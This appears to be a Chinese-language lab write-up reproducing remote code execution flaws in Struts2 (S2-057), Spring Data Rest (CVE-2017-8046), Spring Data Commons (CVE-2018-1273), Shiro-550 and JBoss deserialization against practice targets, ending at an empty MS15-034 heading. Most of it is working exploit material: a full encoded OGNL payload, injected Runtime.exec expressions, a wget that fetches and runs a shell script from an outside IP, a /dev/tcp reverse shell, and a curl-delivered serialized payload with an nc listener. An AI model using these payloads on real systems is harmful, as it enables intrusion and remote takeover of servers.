S2-057远程执行代码漏洞
环境
复现
访问靶场
在url处输入 http://123.57.211.129:8080/struts2-showcase/${(123+123)}/actionChain1.action 后刷新可以看到中间数字位置相加了
抓包,将上面验证payload的值修改为我们的利用exp:
/struts2-showcase/$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action
执行成功
Spring Data Rest 远程命令执行命令(CVE-2017-8046)
环境
复现
1.访问 http://your-ip:8080/customers/1,然后抓取数据包,使用PATCH请求来修改
写入的数据为
[{ "op": "replace" , "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname" , "value": "vulhub" }]
查看dock容器下的文件,发现成功写入
完成
spring 代码执⾏ (CVE-2018-1273)
环境
复现
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/crz")]=&password=&repeatedPassword=
docker exec -it 5fb01f48678a /bin/bash
Shiro rememberMe反序列化漏洞(Shiro-550)
环境
复现
验证Shiro框架
/usr/bin/wget -qO /tmp/shell.sh http://123.57.211.129/shell.sh
sh -i >& /dev/tcp/123.57.211.129/6666 0>&1
执行shell.sh文件
/bin/bash /tmp/shell.sh
反弹成功
JBoss EJBInvokerServlet CVE-2013-4810 反序列化漏洞
环境
vulhub/jboss/JMXInvokerServlet-deserialization
复现
#创建class⽂件javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java#创建反序列化⽂件java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 123.57.211.129:6666#监听 6666 端⼝nc -lvvp 6666#psot提交curl http://123.57.211.129:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
创建class⽂件
创建反序列化⽂件
监听6666端⼝
psot提交
完成
HTTP.SYS远程代码执⾏(MS15-034) MS-->Microsoft 2015 -034
环境
windows server 2012 IIS8.5